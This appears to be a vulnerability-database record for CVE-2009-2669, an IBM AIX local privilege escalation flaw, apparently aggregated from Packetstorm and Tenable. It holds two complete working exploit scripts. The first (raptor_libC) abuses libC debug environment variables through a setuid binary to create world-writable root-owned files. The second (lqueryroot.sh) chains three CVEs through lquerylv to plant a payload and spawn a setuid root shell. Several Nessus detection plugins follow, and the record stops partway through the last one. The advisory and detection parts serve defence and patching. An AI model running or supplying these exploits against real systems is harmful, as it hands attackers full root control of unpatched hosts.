ID CVE-2009-2669 Type cve Reporter cve@mitre.org Modified 2009-08-12T05:30:00
Description
A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which allows local users to gain privileges by leveraging a setuid-root program to create an arbitrary root-owned file with world-writable permissions, related to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1.
{"packetstorm": [{"lastseen": "2016-12-05T22:12:48", "bulletinFamily": "exploit", "description": "", "modified": "2009-09-11T00:00:00", "published": "2009-09-11T00:00:00", "href": "https://packetstormsecurity.com/files/81223/IBM-AIX-5.6-6.1-File-Overwrite.html", "id": "PACKETSTORM:81223", "type": "packetstorm", "title": "IBM AIX 5.6/6.1 File Overwrite", "sourceData": "`#!/bin/sh \n \n# \n# $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $ \n# \n# raptor_libC - AIX arbitrary file overwrite via libC debug \n# Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net> \n# \n# Property of @ Mediaservice.net Srl Data Security Division \n# http://www.mediaservice.net/ http://lab.mediaservice.net/ \n# \n# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING *** \n# \n# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle \n# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which \n# allows local users to gain privileges by leveraging a setuid-root program to \n# create an arbitrary root-owned file with world-writable permissions, related \n# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1 \n# (CVE-2009-2669). \n# \n# Typical privilege escalation techniques via arbitrary file creation don't \n# seem to work on recent AIX versions: .rhosts is ignored if it is group or \n# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries; \n# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's \n# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come \n# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys, \n# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d. \n# \n# See also: http://milw0rm.com/exploits/9306 \n# \n# Usage: \n# $ uname -a \n# AIX rs6000 3 5 0052288E4C00 \n# $ lslpp -L xlC.rte | grep xlC.rte \n# xlC.rte 9.0.0.1 C F XL C/C++ Runtime \n# $ chmod +x raptor_libC \n# $ ./raptor_libC /bin/bobobobobob \n# [...] \n# -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob \n# \n# Vulnerable platforms (AIX 5.3): \n# xlC.rte < 8.0.0.0 [untested] \n# xlC.rte 8.0.0.0-8.0.0.14 [untested] \n# xlC.rte 9.0.0.0-9.0.0.9 [tested] \n# xlC.rte 10.1.0.0-10.1.0.2 [untested] \n# \n# Vulnerable platforms (AIX 6.1): \n# bos.rte.libc 6.1.0.0-6.1.0.11 [untested] \n# bos.rte.libc 6.1.1.0-6.1.1.6 [untested] \n# bos.rte.libc 6.1.2.0-6.1.2.5 [untested] \n# bos.rte.libc 6.1.3.0-6.1.3.2 [untested] \n# bos.adt.prof 6.1.0.0-6.1.0.10 [untested] \n# bos.adt.prof 6.1.1.0-6.1.1.5 [untested] \n# bos.adt.prof 6.1.2.0-6.1.2.4 [untested] \n# bos.adt.prof 6.1.3.0-6.1.3.1 [untested] \n# \n \necho \"raptor_libC - AIX arbitrary file overwrite via libC debug\" \necho \"Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>\" \necho \n \n# check the arguments \nif [ -z \"$1\" ]; then \necho \"*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***\" \necho \necho \"Usage: $0 <filename>\" \necho \nexit \nfi \n \n# prepare the environment \n_LIB_INIT_DBG=1 \n_LIB_INIT_DBG_FILE=$1 \nexport _LIB_INIT_DBG _LIB_INIT_DBG_FILE \n \n# gimme -rw-rw-rw-! \numask 0 \n \n# setuid program linked to /usr/lib/libC.a \n/usr/dt/bin/dtappgather \n \n# other good setuid targets \n# /usr/dt/bin/dtprintinfo \n# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey \n \n# check the created file \nls -l $_LIB_INIT_DBG_FILE \necho \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/81223/aix-overwrite.txt"}, {"lastseen": "2016-12-05T22:19:22", "bulletinFamily": "exploit", "description": "", "modified": "2016-11-04T00:00:00", "published": "2016-11-04T00:00:00", "href": "https://packetstormsecurity.com/files/139565/AIX-5.3-6.1-7.1-7.2-lquerylv-Local-Root.html", "id": "PACKETSTORM:139565", "title": "AIX 5.3 / 6.1 / 7.1 / 7.2 lquerylv Local Root", "type": "packetstorm", "sourceData": "`#!/usr/bin/sh \n# \n# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04) \n# \n# This exploit takes advantage of known issues with debugging functions \n# within the AIX linker library. We are taking advantage of known \n# functionality, and focusing on badly coded SUID binaries which do not \n# adhere to proper security checks prior to seteuid/open/writes. \n# \n# The CVEs we will be taking advantage of: \n# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows \n# local users to create or overwrite arbitrary files via a symlink attack on \n# the log file associated with the MALLOCDEBUG environment variable. \n# \n# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does \n# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE \n# environment variables, which allows local users to gain privileges by \n# leveraging a setuid-root program to create an arbitrary root-owned file \n# with world-writable permissions, related to libC.a (aka the XL C++ runtime \n# library) in AIX 5.3 and libc.a in AIX 6.1. \n# \n# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary \n# File Writes In IBM AIX. \n# \n# In each instance of the aforementioned CVEs, IBM merely patched the binaries \n# which were reported in the original reports as being used for escalation of \n# the vulnerabilities. This allowed for the lquerylv binary to slip by their \n# patches and become an attack vector. \n# \n# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ \n# \n# lqueryroot.sh by @hxmonsegur [2016 //RSL] \n \nROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') \nAPP=$0 \n \nfunction usage \n{ \necho \"Usage: $APP [1] | [2] | [3]\" \necho \necho \"1 - MALLOCDEBUG file write -> escalation\" \necho \"2 - _LIB_INIT_DBG_FILE file write -> escalation\" \necho \"3 - MALLOCBUCKETS file write -> escalation\" \necho \necho \"[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL\" \nexit \n} \n \nfunction CVE20091786 \n{ \necho \"[*] Exporting MALLOCDEBUG environment variable\" \nMALLOCTYPE=debug \nMALLOCDEBUG=report_allocations,output:/etc/suid_profile \nexport MALLOCTYPE MALLOCDEBUG \n} \n \nfunction CVE20092669 \n{ \necho \"[*] Exporting _LIB_INIT_DBG_FILE environment variable\" \n_LIB_INIT_DBG=1 \n_LIB_INIT_DBG_FILE=/etc/suid_profile \nexport _LIB_INIT_DBG _LIB_INIT_DBG_FILE \n} \n \nfunction CVE20143074 \n{ \necho \"[*] Exporting MALLOCBUCKETS environment variable\" \nMALLOCOPTIONS=buckets \nMALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile \nexport MALLOCOPTIONS MALLOCBUCKETS \n} \n \nif [ -z \"$1\" ]; then \nusage \nexit 1 \nfi \n \nwhile [ \"$1\" != \"\" ]; do \ncase $1 in \n1 ) CVE20091786;; \n2 ) CVE20092669;; \n3 ) CVE20143074;; \n* ) usage \nbreak;; \nesac \nshift \ndone \n \nif [ ! -x \"/usr/sbin/lquerylv\" ]; then \necho \"[-] lquerylv isn't executable. Tough luck.\" \nexit 1 \nfi \n \necho \"[*] Setting umask to 000\" \numask 000 \n \necho \"[*] Execute our vulnerable binary\" \n/usr/sbin/lquerylv >/dev/null 2>&1 \n \nif [ ! -e \"/etc/suid_profile\" ]; then \necho \"[-] /etc/suid_profile does not exist and exploit failed.\" \nexit 1 \nfi \n \necho \"[*] Cleaning up /etc/suid_profile\" \necho > /etc/suid_profile \n \necho \"[*] Current id: `/usr/bin/id`\" \n \necho \"[*] Adding payload\" \ncat << EOF >/etc/suid_profile \ncp /bin/ksh $ROOTSHELL \n/usr/bin/syscall setreuid 0 0 \nchown root:system $ROOTSHELL \nchmod 6755 $ROOTSHELL \nrm /etc/suid_profile \nEOF \n \necho \"[*] Unsetting env\" \nunset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE \n \necho \"[*] Executing ibstat for fun and profit\" \n/usr/bin/ibstat -a >/dev/null 2>&1 \n \nif [ ! -e \"$ROOTSHELL\" ]; then \necho \"[-] Rootshell does not exist and exploit failed.\" \nexit 1 \nfi \n \necho \"[*] Executing rootshell\" \n$ROOTSHELL \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139565/aixlquery-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-12-13T06:37:33", "bulletinFamily": "scanner", "description": "There is a an error in the handling of the _LIB_INIT_DBG and\n_LIB_INIT_DBG_FILE environment variables in a debugging component of\nthe XL C++ runtime library. A local user can exploit this error when\nexecuting setuid root programs linked with the XL C++ runtime library,\nand thereby create arbirtrary, world writeable files owned by root.\n\nThe successful exploitation of this vulnerability allows a local user\nto create arbitrary files and execute arbitrary code as the root user.\n\nNote that in AIX 6.1 the debugging component moved from\nlibC.a to libc.a. This means that the fix is delivered by\nupdating the XL C++ runtime on AIX 5.3 and earlier, and by\nupdating the bos.rte.libc fileset on AIX 6.1.\n\nThe following libraries are vulnerable :\n\nAIX 5.3 and earlier: /usr/lpp/xlC/lib/libC.a\n\nAIX 6.1: /usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2019-12-02T00:00:00", "id": "AIX_IZ56206.NASL", "href": "https://www.tenable.com/plugins/nessus/64344", "published": "2013-01-30T00:00:00", "title": "AIX 6.1 TL 3 : libC (IZ56206)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libC_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64344);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/16 14:12:52\");\n\n script_cve_id(\"CVE-2009-2669\");\n\n script_name(english:\"AIX 6.1 TL 3 : libC (IZ56206)\");\n script_summary(english:\"Check for APAR IZ56206\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a an error in the handling of the _LIB_INIT_DBG and\n_LIB_INIT_DBG_FILE environment variables in a debugging component of\nthe XL C++ runtime library. A local user can exploit this error when\nexecuting setuid root programs linked with the XL C++ runtime library,\nand thereby create arbirtrary, world writeable files owned by root.\n\nThe successful exploitation of this vulnerability allows a local user\nto create arbitrary files and execute arbitrary code as the root user.\n\nNote that in AIX 6.1 the debugging component moved from\nlibC.a to libc.a. This means that the fix is delivered by\nupdating the XL C++ runtime on AIX 5.3 and earlier, and by\nupdating the bos.rte.libc fileset on AIX 6.1.\n\nThe following libraries are vulnerable :\n\nAIX 5.3 and earlier: /usr/lpp/xlC/lib/libC.a\n\nAIX 6.1: /usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libC_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"03\", patch:\"IZ56206_03\", package:\"bos.rte.libc\", minfilesetver:\"6.1.3.0\", maxfilesetver:\"6.1.3.2\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"03\", patch:\"IZ56206_03\", package:\"bos.adt.prof\", minfilesetver:\"6.1.3.0\", maxfilesetver:\"6.1.3.1\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"03\", patch:\"IZ56206_3p\", package:\"bos.rte.libc\", minfilesetver:\"6.1.3.0\", maxfilesetver:\"6.1.3.2\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"03\", patch:\"IZ56206_3p\", package:\"bos.adt.prof\", minfilesetver:\"6.1.3.0\", maxfilesetver:\"6.1.3.1\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T06:37:33", "bulletinFamily": "scanner", "description": "There is a an error in the handling of the _LIB_INIT_DBG and\n_LIB_INIT_DBG_FILE environment variables in a debugging component of\nthe XL C++ runtime library. A local user can exploit this error when\nexecuting setuid root programs linked with the XL C++ runtime library,\nand thereby create arbirtrary, world writeable files owned by root.\n\nThe successful exploitation of this vulnerability allows a local user\nto create arbitrary files and execute arbitrary code as the root user.\n\nNote that in AIX 6.1 the debugging component moved from\nlibC.a to libc.a. This means that the fix is delivered by\nupdating the XL C++ runtime on AIX 5.3 and earlier, and by\nupdating the bos.rte.libc fileset on AIX 6.1.\n\nThe following libraries are vulnerable :\n\nAIX 5.3 and earlier: /usr/lpp/xlC/lib/libC.a\n\nAIX 6.1: /usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2019-12-02T00:00:00", "id": "AIX_IZ56203.NASL", "href": "https://www.tenable.com/plugins/nessus/64341", "published": "2013-01-30T00:00:00", "title": "AIX 6.1 TL 0 : libC (IZ56203)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libC_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64341);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/16 14:12:52\");\n\n script_cve_id(\"CVE-2009-2669\");\n\n script_name(english:\"AIX 6.1 TL 0 : libC (IZ56203)\");\n script_summary(english:\"Check for APAR IZ56203\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a an error in the handling of the _LIB_INIT_DBG and\n_LIB_INIT_DBG_FILE environment variables in a debugging component of\nthe XL C++ runtime library. A local user can exploit this error when\nexecuting setuid root programs linked with the XL C++ runtime library,\nand thereby create arbirtrary, world writeable files owned by root.\n\nThe successful exploitation of this vulnerability allows a local user\nto create arbitrary files and execute arbitrary code as the root user.\n\nNote that in AIX 6.1 the debugging component moved from\nlibC.a to libc.a. This means that the fix is delivered by\nupdating the XL C++ runtime on AIX 5.3 and earlier, and by\nupdating the bos.rte.libc fileset on AIX 6.1.\n\nThe following libraries are vulnerable :\n\nAIX 5.3 and earlier: /usr/lpp/xlC/lib/libC.a\n\nAIX 6.1: /usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libC_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ56203_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.11\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ56203_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.10\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ56203_0p\", package:\"bos.rte.libc\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.11\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ56203_0p\", package:\"bos.adt.prof\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.10\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T06:37:33", "bulletinFamily": "scanner", "description": "There is a an error in the handling of the _LIB_INIT_DBG and\n_LIB_INIT_DBG_FILE environment variables in a debugging component of\nthe XL C++ runtime library. A local user can exploit this error when\nexecuting setuid root programs linked with the XL C++ runtime library,\nand thereby create arbirtrary, world writeable files owned by root.\n\nThe successful exploitation of this vulnerability allows a local user\nto create arbitrary files and execute arbitrary code as the root user.\n\nNote that in AIX 6.1 the debugging component moved from\nlibC.a to libc.a. This means that the fix is delivered by\nupdating the XL C++ runtime on AIX 5.3 and earlier, and by\nupdating the bos.rte.libc fileset on AIX 6.1.\n\nThe following libraries are vulnerable :\n\nAIX 5.3 and earlier: /usr/lpp/xlC/lib/libC.a\n\nAIX 6.1: /usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2019-12-02T00:00:00", "id": "AIX_IZ56204.NASL", "href": "https://www.tenable.com/plugins/nessus/64342", "published": "2013-01-30T00:00:00", "title": "AIX 6.1 TL 1 : libC (IZ56204)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libC_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64342);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/16 14:12:52\");\n\n script_cve_id(\"CVE-2009-2669\");\n\n script_name(english:\"AIX 6.1 TL 1 : libC (IZ56204)\");\n script_summary(english:\"Check for APAR IZ56204\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a an error in the handling of the _LIB_INIT_DBG and\n_LIB_INIT_DBG_FILE environment variables in a debugging component of\nthe XL C++ runtime library. A local user can exploit this error when\nexecuting setuid root programs linked with the XL C++ runtime library,\nand thereby create arbirtrary, world writeable files owned by root.\n\nThe successful exploitation of this vulnerability allows a local user\nto create arbitrary files and execute arbitrary code as the root user.\n\nNote that in AIX 6.1 the debugging component moved from\nlibC.a to libc.a. This means that the fix is delivered by\nupdating the XL C++ runtime on AIX 5.3 and earlier, and by\nupdating the bos.rte.libc fileset on AIX 6.1.\n\nThe following libraries are vulnerable :\n\nAIX 5.3 and earlier: /usr/lpp/xlC/lib/libC.a\n\nAIX 6.1: /usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libC_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ56204_01\", package:\"bos.rte.libc\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.1.6\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ56204_01\", package:\"bos.adt.prof\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.1.5\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ56204_1p\", package:\"bos.rte.libc\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.1.6\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ56204_1p\", package:\"bos.adt.prof\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.1.5\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T06:37:33", "bulletinFamily": "scanner", "description": "There is a an error in the handling of the _LIB_INIT_DBG and\n_LIB_INIT_DBG_FILE environment variables in a debugging component of\nthe XL C++ runtime library. A local user can exploit this error when\nexecuting setuid root programs linked with the XL C++ runtime library,\nand thereby create arbirtrary, world writeable files owned by root.\n\nThe successful exploitation of this vulnerability allows a local user\nto create arbitrary files and execute arbitrary code as the root user.\n\nNote that in AIX 6.1 the debugging component moved from\nlibC.a to libc.a. This means that the fix is delivered by\nupdating the XL C++ runtime on AIX 5.3 and earlier, and by\nupdating the bos.rte.libc fileset on AIX 6.1.\n\nThe following libraries are vulnerable :\n\nAIX 5.3 and earlier: /usr/lpp/xlC/lib/libC.a\n\nAIX 6.1: /usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2019-12-02T00:00:00", "id": "AIX_IZ56205.NASL", "href": "https://www.tenable.com/plugins/nessus/64343", "published": "2013-01-30T00:00:00", "title": "AIX 6.1 TL 2 : libC (IZ56205)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libC_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64343);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/16 14:12:52\");\n\n script_cve_id(\"CVE-2009-2669\");\n\n script_name(english:\"AIX 6.1 TL 2 : libC (IZ56205)\");\n script_summary(english:\"Check for APAR IZ56205\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a an error in the handling of the _LIB_INIT_DBG and\n_LIB_INIT_DBG_FILE environment variables in a debugging component of\nthe XL C++ runtime library. A local user can exploit this error when\nexecuting setuid root programs linked with the XL C++ runtime library,\nand thereby create arbirtrary, world writeable files owned by root.\n\nThe successful exploitation of this vulnerability allows a local user\nto create arbitrary files and execute arbitrary code as the root user.\n\nNote that in AIX 6.1 the debugging component moved from\nlibC.a to libc.a. This means that the fix is delivered by\nupdating the XL C++ runtime on AIX 5.3 and earlier, and by\nupdating the bos.rte.libc fileset on AIX 6.1.\n\nThe following libraries are vulnerable :\n\nAIX 5.3 and earlier: /usr/lpp/xlC/lib/libC.a\n\nAIX 6.1: /usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libC_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ56205_02\", package:\"bos.rte.libc\", minfilesetver:\"6.1.2.0\", 